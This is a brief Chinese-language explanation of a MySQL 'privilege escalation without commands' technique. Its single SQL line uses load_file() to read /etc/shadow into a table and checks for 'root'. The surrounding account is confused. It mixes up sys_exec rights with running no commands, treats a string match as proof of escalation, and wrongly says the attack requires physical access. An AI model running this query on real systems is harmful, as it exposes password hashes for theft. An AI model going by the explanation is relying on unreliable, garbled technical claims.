MySQL提权不执行命令是指在未经授权的情况下,获取sys_exec权限并不执行任何命令的攻击方法。这种攻击方式被称为“不借助神器的后门提权”。
use mysql;create table `sudo`(`d` blob);insert into `sudo`(`d`) values(load_file('/etc/shadow'));select"yes"where(select substring(`d`,1,4) from `sudo` limit 1)="root";
上面的代码是MySQL提权不执行命令的示例代码。首先创建了一个名为“sudo”的表,然后插入了一个包含“/etc/shadow”文件的blob类型数据。最后通过判断该数据是否包含“root”字段来验证是否成功获取了提权权限。
但需要注意的是,这种攻击方法仅在拥有对MySQL数据存储的物理访问权限的情况下才可实现。因此,建议管理员加强对MySQL数据库的物理访问权限控制,避免黑客突破物理安全防线进入数据库。
